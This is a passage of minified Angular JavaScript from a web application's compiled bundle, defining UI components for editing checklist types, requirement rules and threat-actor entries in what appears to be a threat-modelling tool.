new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-controls"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"node","control",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"node","control"]],template:function(e,i){1&e&&ne(0,jft,9,3,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,an,Ta,Ea,nn,un,Go,Xa,T2,Xi]}),t})();const $ft=["reqNavTree"];function Kft(t,a){if(1&t&&(m(0,"div",23),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.Abbr)}}function Xft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",20),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedLevel=r)}),s(1,"\n                    "),m(2,"mat-icon",21),s(3,"arrow_right"),u(),s(4,"\n                    "),ne(5,Kft,2,1,"div",22),s(6,"\n                    "),m(7,"div",23),s(8),u(),s(9,"\n                    "),m(10,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteLevel(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedLevel===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLevel===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(5),V("ngIf",e.Abbr),C(3),ke(e.Name),C(2),at("matTooltip",re(11,8,"general.Delete"))}}function Yft(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(B(5).selectedLevel.Name="")}),oe(1,"translate"),s(2,"\n                        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Jft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"div",25),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Name=n)}),u(),s(11,"\n                      "),ne(12,Yft,6,3,"button",28),s(13,"\n                    "),u(),s(14,"\n                    "),it(15,"br"),s(16,"\n                    "),m(17,"mat-form-field",26),s(18,"\n                      "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                      "),m(23,"input",27),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Abbr=n)}),u(),s(24,"\n                    "),u(),s(25,"\n                    "),it(26,"br"),s(27,"\n                    "),m(28,"mat-form-field",3),s(29,"\n                      "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n                      "),m(34,"textarea",29),he("ngModelChange",function(n){return be(e),Me(B(4).selectedLevel.Description=n)}),u(),s(35,"\n                    "),u(),s(36,"\n                  "),u(),s(37,"\n                "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,13,"general.Name")),C(3),at("matTooltip",e.selectedLevel.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Name),C(2),V("ngIf",e.selectedLevel.Name),C(8),ke(re(21,15,"properties.Abbr")),C(3),at("matTooltip",e.selectedLevel.Abbr),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Abbr),C(8),ke(re(32,17,"properties.Description")),C(3),at("matTooltip",e.selectedLevel.Description),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedLevel.Description)}}function Zft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",13),s(2,"\n              "),m(3,"div",14),s(4,"\n                "),m(5,"mat-list",15),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedChecklistType.Levels))}),s(6,"\n                  "),m(7,"div",16),s(8),oe(9,"translate"),m(10,"button",17),he("click",function(){return be(e),Me(B(3).AddLevel())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,Xft,15,10,"mat-list-item",18),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",19),s(20,"\n                "),ne(21,Jft,38,19,"ng-container",2),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedChecklistType.Name," ",re(9,9,"properties.Levels")," "),C(2),at("matTooltip",re(11,11,"general.Add")),C(5),V("ngForOf",e.selectedChecklistType.Levels),C(6),V("ngIf",e.selectedLevel&&e.selectedChecklistType.Levels.includes(e.selectedLevel))}}function ept(t,a){if(1&t&&(m(0,"td",34),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e.Abbr)}}function tpt(t,a){if(1&t){const e=Ye();m(0,"td",34)(1,"mat-checkbox",35),he("ngModelChange",function(n){const c=be(e).index;return Me(B(4).selectedRequirementType.RequiredPerLevel[c]=n)})("change",function(n){const c=be(e).index;return Me(B(4).OnRequiredChanged(n,c))}),u()()}if(2&t){const e=a.index,i=B(4);C(1),V("ngModel",i.selectedRequirementType.RequiredPerLevel[e])}}function ipt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                      ",re(2,2,i.GetReqFulfillRuleTypeName(e)),"\n                    ")}}function apt(t,a){if(1&t&&(m(0,"mat-option",36),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ct("\n                        ",e.Name,"\n                      ")}}function npt(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function opt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function rpt(t,a){if(1&t&&(m(0,"mat-option",36),s(1,"\n                          "),ne(2,npt,3,3,"ng-container",2),s(3,"\n                          "),ne(4,opt,2,1,"ng-container",2),s(5,"\n                        "),u()),2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function spt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                      "),m(2,"button",39),he("click",function(){be(e);const n=B(6);return Me(n.OnNextComparisonType(n.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest))}),s(3),u(),s(4,"\n                      "),m(5,"mat-checkbox",40),he("ngModelChange",function(n){return be(e),Me(B(6).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value=n)}),u(),s(6,"\n                      "),it(7,"br"),s(8,"\n                      "),m(9,"mat-checkbox",41),he("ngModelChange",function(n){return be(e),Me(B(6).selectedRequirementType.ReqFulfillRule.NeedsReview=n)}),s(10),oe(11,"translate"),u(),s(12,"\n                    "),Mt()}if(2&t){const e=B(6);C(3),ct("\n                        ",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ComparisonType,"\n                      "),C(2),V("ngModel",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.Value),C(4),V("ngModel",e.selectedRequirementType.ReqFulfillRule.NeedsReview),C(1),ke(re(11,4,"properties.NeedsReview"))}}function cpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                    "),it(2,"br"),s(3,"\n                    "),m(4,"mat-form-field",26),s(5,"\n                      "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                      "),m(10,"mat-select",38),he("valueChange",function(n){return be(e),Me(B(5).selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID=n)}),s(11,"\n                        "),ne(12,rpt,6,3,"mat-option",33),s(13,"\n                      "),u(),s(14,"\n                    "),u(),s(15,"\n                    "),ne(16,spt,13,6,"ng-container",2),s(17,"\n                  "),Mt()}if(2&t){const e=B(5);C(7),ke(re(8,4,"general.PropertyName")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID),C(2),V("ngForOf",e.GetAvailableProperties()),C(4),V("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest||null==e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.PropertyRest.ID.length)>0)}}function lpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                  "),m(2,"mat-form-field",37),s(3,"\n                    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                    "),m(8,"mat-select",38),he("valueChange",function(n){return be(e),Me(B(4).selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID=n)}),s(9,"\n                      "),ne(10,apt,2,2,"mat-option",33),s(11,"\n                    "),u(),s(12,"\n                  "),u(),s(13,"\n                  "),ne(14,cpt,18,6,"ng-container",2),s(15,"\n                "),Mt()}if(2&t){const e=B(4);C(5),ke(re(6,4,"properties.ComponentType")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID),C(2),V("ngForOf",e.GetMyComponentSWTypes()),C(4),V("ngIf",(null==e.selectedRequirementType.ReqFulfillRule.SWRule||null==e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID?null:e.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID.length)>0)}}function dpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"div",25),s(3,"\n                "),m(4,"h2"),s(5),u(),s(6,"\n                "),m(7,"mat-form-field",3),s(8,"\n                  "),m(9,"mat-label"),s(10),oe(11,"translate"),u(),s(12,"\n                  "),m(13,"textarea",4),he("ngModelChange",function(n){return be(e),Me(B(3).selectedRequirementType.Description=n)}),u(),s(14,"\n                "),u(),s(15,"\n                "),m(16,"table"),s(17,"\n                  "),m(18,"tr"),s(19,"\n                    "),it(20,"td"),s(21,"\n                    "),ne(22,ept,2,1,"td",31),s(23,"\n                  "),u(),s(24,"\n                  "),m(25,"tr"),s(26,"\n                    "),m(27,"td"),s(28),oe(29,"translate"),u(),s(30,"\n                    "),ne(31,tpt,2,1,"td",31),s(32,"\n                  "),u(),s(33,"\n                "),u(),s(34,"\n                "),it(35,"br"),s(36,"\n                "),m(37,"mat-form-field",26),s(38,"\n                  "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n                  "),m(43,"mat-select",32),he("valueChange",function(n){return be(e),Me(B(3).selectedRequirementType.ReqFulfillRule.RuleType=n)})("selectionChange",function(n){return be(e),Me(B(3).OnReqRuleTypeChanged(n))}),s(44,"\n                    "),m(45,"mat-option"),s(46),oe(47,"translate"),u(),s(48,"\n                    "),ne(49,ipt,3,4,"mat-option",33),s(50,"\n                  "),u(),s(51,"\n                "),u(),s(52,"\n                "),ne(53,lpt,16,6,"ng-container",2),s(54,"\n              "),u(),s(55,"\n            "),Mt()}if(2&t){const e=B(3);C(5),ke(e.selectedRequirementNode.name()),C(5),ke(re(11,12,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedRequirementType.Description),C(9),V("ngForOf",e.selectedChecklistType.Levels),C(6),ke(re(29,14,"general.Required")),C(3),V("ngForOf",e.selectedChecklistType.Levels),C(9),ke(re(41,16,"properties.ReqFulfillRuleType")),C(3),V("value",e.selectedRequirementType.ReqFulfillRule.RuleType),C(3),ke(re(47,18,"properties.selectNone")),C(3),V("ngForOf",e.GetReqFulfillRuleTypes()),C(4),V("ngIf",1==e.selectedRequirementType.ReqFulfillRule.RuleType)}}function mpt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",3),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",4),he("ngModelChange",function(n){return be(e),Me(B(2).selectedChecklistType.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    \n    "),m(11,"mat-tab-group",5),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(12,"\n      "),m(13,"mat-tab",6),oe(14,"translate"),s(15,"\n          "),ne(16,Zft,25,13,"ng-template",7),s(17,"\n      "),u(),s(18,"\n      "),m(19,"mat-tab",6),oe(20,"translate"),s(21,"\n        "),m(22,"as-split",8),he("dragEnd",function(n){return be(e),Me(B(2).OnSplitSizeChange(n,0))}),s(23,"\n          "),m(24,"as-split-area",9),s(25,"\n            "),m(26,"app-nav-tree",10,11),he("selectedNodeChanged",function(n){return be(e),Me(B(2).selectedRequirementNode=n)}),u(),s(28,"\n          "),u(),s(29,"\n          "),m(30,"as-split-area",12),s(31,"\n            "),ne(32,dpt,56,20,"ng-container",2),s(33,"\n          "),u(),s(34,"\n        "),u(),s(35,"\n      "),u(),s(36,"\n    "),u(),s(37,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,22,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedChecklistType.Description),C(3),V("selectedIndex",e.GetSelectedTabIndex()),C(2),at("label",re(14,24,"general.Settings")),C(6),at("label",re(20,26,"general.Requirements")),C(3),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light2",!e.theme.IsDarkMode)("splitter-dark2",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,0,300))("order",1),C(2),V("activeNode",e.selectedRequirementNode),C(4),Ct("bg-color-light3",!e.theme.IsDarkMode)("bg-color-dark3",e.theme.IsDarkMode),V("size",e.GetSplitSize(0,1,"*"))("order",2),C(2),V("ngIf",e.selectedRequirementType)}}function upt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,mpt,38,28,"ng-container",2),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedChecklistType)}}let hpt=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.componentProperties={},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedLevel=null,this.selectedRequirementNode=null,setTimeout(()=>{this.createRequirementNodes()},100)}get selectedChecklistType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get selectedRequirementNode(){return this._selectedRequirementNode}set selectedRequirementNode(e){this._selectedRequirementNode=e,this.selectedRequirementType=null==e?void 0:e.data}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}AddLevel(){this.selectedChecklistType.Levels.push({Name:Gi.FindUniqueName("Level",this.selectedChecklistType.Levels.map(e=>e.Name)),Abbr:"",Description:""})}DeleteLevel(e){const i=this.selectedChecklistType.Levels.findIndex(n=>n.Name==e.Name&&n.Abbr==e.Abbr);i>=0&&this.selectedChecklistType.Levels.splice(i,1)}OnRequiredChanged(e,i){if(e.checked)for(let n=i+1;n<this.selectedChecklistType.Levels.length;n++)this.selectedRequirementType.RequiredPerLevel[n]=!0}OnReqRuleTypeChanged(e){e.value==Xg.SWComponent&&(this.selectedRequirementType.ReqFulfillRule.SWRule={ComponentTypeID:"",PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!0}})}GetAvailableProperties(){let e=this.selectedRequirementType.ReqFulfillRule.SWRule.ComponentTypeID;if(null==this.componentProperties[e]){let i=this.dataService.Config.GetMyComponentType(e),n=[];n.push({DisplayName:"properties.IsActive",ID:"IsActive",Tooltip:"",HasGetter:!0,Type:Ii.CheckBox,Editable:!0}),n.push({DisplayName:"properties.IsThirdParty",ID:"IsThirdParty",Tooltip:"",HasGetter:!0,Type:Ii.CheckBox,Editable:!0}),n.push(...i.Properties),this.componentProperties[e]=n}return this.componentProperties[e]}OnNextComparisonType(e){let i=Object.values(cc),n=i.length;n=2,e.ComparisonType=i[(i.indexOf(e.ComparisonType)+1)%2]}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}GetMyComponentSWTypes(){return this.dataService.Config.GetMyComponentSWTypes()}GetReqFulfillRuleTypes(){return GG.GetTypes()}GetReqFulfillRuleTypeName(e){return GG.ToString(e)}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_CONFIG_CHECKLISTS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_CONFIG_CHECKLISTS_TAB_INDEX,e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(r,c)=>{let d={name:()=>r.Name,canSelect:!0,data:r,canAdd:!1,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteChecklistType(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetChecklistTypes();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetChecklistTypes();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.Checklists"),canSelect:!1,icon:"fact_check",canAdd:!0,hasMenu:!0,onAdd:()=>{let r=this.dataService.Config.CreateChecklistType();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetChecklistTypes().forEach(r=>{let c=i(r,n);n.children.push(c)}),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}createRequirementNodes(){var e;const i=this.reqNodes;this.reqNodes=[];let n=(c,d)=>{let T={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateRequirementType();c.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDuplicate:!0,onDuplicate:()=>{let k=this.dataService.Config.CreateRequirementType();k.CopyFrom(c.Data),k.Name=k.Name+"-Copy",d.data instanceof Jg?d.data.AddRequirementType(k):d.data instanceof Yg&&d.data.AddSubRequirementType(k),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(k),this.selectedRequirementNode.isRenaming=!0},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteRequirementType(c),this.selectedNode==T&&(this.selectedNode=null),this.createRequirementNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),0!=k.findIndex(q=>q==c.ID)){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=[];if(d.data instanceof Jg?k=d.data.Data.requirementTypeIDs:d.data instanceof Yg&&(k=d.data.Data.subReqTypeIDs),k.findIndex(q=>q==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),r.children.splice(q,0,r.children.splice(q+1,1)[0])}}};return c.SubReqTypes.forEach(k=>T.children.push(n(k,T))),T},r={name:()=>this.translate.instant("general.Requirements"),canSelect:!1,icon:"check_circle_outline",data:this.selectedChecklistType,canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateRequirementType();this.selectedChecklistType.AddRequirementType(c),this.createRequirementNodes(),this.selectedRequirementNode=this.ReqFindNodeOfObject(c),this.selectedRequirementNode.isRenaming=!0},children:[]};this.selectedChecklistType&&(this.selectedChecklistType.RequirementTypes.forEach(c=>{let d=n(c,r);r.children.push(d)}),this.reqNodes.push(r),xa.TransferExpandedState(i,this.reqNodes),null===(e=this.reqNavTree)||void 0===e||e.SetNavTreeData(this.reqNodes))}ReqFindNodeOfObject(e){return this.reqFindNodeOfObjectRec(e,this.reqNodes)}reqFindNodeOfObjectRec(e,i){for(let n=0;n<i.length;n++){if(i[n].data==e)return i[n];if(i[n].children){let r=this.reqFindNodeOfObjectRec(e,i[n].children);if(r)return r}}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-checklists"]],viewQuery:function(e,i){if(1&e&&Mi($ft,5),2&e){let n;Vt(n=Bt())&&(i.reqNavTree=n.first)}},inputs:{selectedNode:"selectedNode",selectedRequirementNode:"selectedRequirementNode"},features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px; height: 100%;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px","height","100%"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"height","100%",3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[2,"overflow","auto",3,"size","order"],[3,"activeNode","selectedNodeChanged"],["reqNavTree",""],[3,"size","order"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",4,"ngIf"],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","text-align: center;",4,"ngFor","ngForOf"],[3,"value","valueChange","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[2,"text-align","center"],["color","primary",3,"ngModel","ngModelChange","change"],[3,"value"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],[3,"value","valueChange"],["mat-raised-button","",2,"margin-left","10px","vertical-align","super",3,"click"],["color","primary",2,"margin-left","10px","vertical-align","super",3,"ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,upt,7,2,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ta,Ea,Zh,xp,Rd,Sd,oa,br,da,nn,un,jr,Nr,yr,qh,Mu,Uh,Go,Xa,es,ts,Or,Lr,rc,Pa,df,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function fpt(t,a){if(1&t&&(m(0,"mat-option",6),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function ppt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1),oe(2,"translate"),it(3,"app-notes",2),s(4),oe(5,"translate"),it(6,"app-notes",2),s(7,"\n  "),m(8,"mat-form-field",3),s(9,"\n    "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n    "),m(14,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().threatActor.Likelihood=n)}),s(15,"\n      "),ne(16,fpt,3,4,"mat-option",5),s(17,"\n    "),u(),s(18,"\n  "),u(),s(19,"\n"),u()}if(2&t){const e=B();C(1),ct("\n  ",re(2,11,"properties.Motive"),":\n  "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.threatActor.Motive),C(1),ct("\n  ",re(5,13,"properties.Capabilities"),":\n  "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.threatActor.Capabilities),C(5),ke(re(12,15,"general.Likelihood")),C(3),V("value",e.threatActor.Likelihood),C(2),V("ngForOf",e.GetLMHValues())}}let xZ=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-actor"]],inputs:{threatActor:"threatActor"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],[3,"showTimestamp","hasCheckbox","strings"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"]],template:function(e,i){1&e&&ne(0,ppt,20,17,"div",0),2&e&&V("ngIf",i.threatActor)},dependencies:[Zi,Ri,nn,un,Nr,yr,Qp,Xi]}),t})();function _pt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),it(5,"app-threat-actor",2),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("threatActor",e.selectedThreatActor)}}let gpt=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r}get selectedThreatActor(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof jp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(r,c)=>{let d={name:()=>r.Name,canSelect:!0,data:r,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatActor(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatActors();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatActors();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.ThreatSources"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"portrait",onAdd:()=>{let 